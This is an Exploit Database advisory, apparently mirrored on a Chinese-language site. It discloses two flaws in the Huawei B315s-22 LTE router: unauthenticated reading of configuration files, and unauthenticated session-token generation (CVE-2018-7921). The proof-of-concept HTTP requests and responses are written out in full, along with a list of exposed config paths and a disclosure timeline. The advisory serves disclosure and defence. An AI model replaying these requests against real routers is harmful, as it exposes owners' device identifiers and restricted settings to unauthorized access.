Huawei B315s-22 – Information Leak

• Exploit Database
• 39 阅读

• 作者： Usman Saeed
  日期： 2018-12-11
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/45971/

• #Product Family: LTE
  #Model B315s – 22
  #Firmware version: 21.318.01.00.26
  #Author: Usman Saeed (usman [at] xc0re.net)
  
  1. Unauthenticated access to sensitive files:
  
  It was observed that the web application running on the router, allows unauthenticated access to sensitive files on the web server.
  
  POC:
  
  By sending a simple GET request without authentication cookie one can get see valid responses:
  
  Request:
  GET /config/deviceinformation/config.xml HTTP/1.1
  Host: <omitted>
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
  Accept: */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  DNT: 1
  Connection: close
  
  Response:
  
  HTTP/1.1 200 OK
  …
  
  <?xml version=”1.0″ encoding=”UTF-8″?>
  <config>
  <devicename>1</devicename>
  <serialnumber>0</serialnumber>
  <imei>1</imei>
  <imsi>1</imsi>
  <iccid>0</iccid>
  <msisdn>1</msisdn>
  <hardwareversion>1</hardwareversion>
  <softwareversion>1</softwareversion>
  …
  
  Other resources accessible are:
  
  /config/dialup/config.xml
  /config/global/config.xml
  /config/global/net-type.xml
  /config/lan/config.xml
  /config/pcassistant/config.xml
  /config/voice/config.xml
  /config/wifi/configure.xml
  ## After discussion with Huawei, according to them as the consequence of this vulnerability is quite low thus they marked it as a non-vulnerability.
  2. Unauthenticated valid token generation [CVE-2018-7921]
  
  It was observed that an unauthenticated user can generate “SessionID” and “__RequestVerificationToken” by simply sending an HTTP GET request to “/api/webserver/SesTokInfo”.
  
  These tokens, although might not give the user full access to the router but using these, one can access to several restricted resources on the router.
  
  POC:
  
  First, we send a GET request, as mentioned above.
  
  Request:
  GET /api/webserver/SesTokInfo HTTP/1.1
  Host: <omitted>
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
  Accept: */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  DNT: 1
  Connection: close
  Content-Length: 0
  
  Response:
  HTTP/1.1 200 OK
  …
  
  <?xml version=”1.0″ encoding=”UTF-8″?>
  <response>
  <SesInfo>SessionID=<omitted></SesInfo>
  <TokInfo><omitted></TokInfo>
  </response>
  
  Now we use these tokens in one of our request where authentication is required:
  
  Request:
  GET /api/cradle/status-info HTTP/1.1
  Host: <omitted>
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
  Accept: */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  __RequestVerificationToken: <omitted>
  X-Requested-With: XMLHttpRequest
  Cookie: SessionID=<omitted>
  DNT: 1
  Connection: close
  
  Response:
  
  HTTP/1.1 200 OK
  …
  
  <?xml version=”1.0″ encoding=”UTF-8″?>
  …
  
  It is to note with an invalid, expired authentication session, the response is:
  
  Response:
  HTTP/1.1 200 OK
  …
  
  <?xml version=”1.0″ encoding=”UTF-8″?>
  <error>
  <code>125002</code>
  <message></message>
  </error>
  
  [+] Responsible Disclosure:
  
  Vulnerabilities identified – 31/07/2018
  Reported to Huawei – 31/07/2018
  Huwaei patched the vulnerability and issued a CVE – 31/08/2018
  Public disclosure – 01/09/2018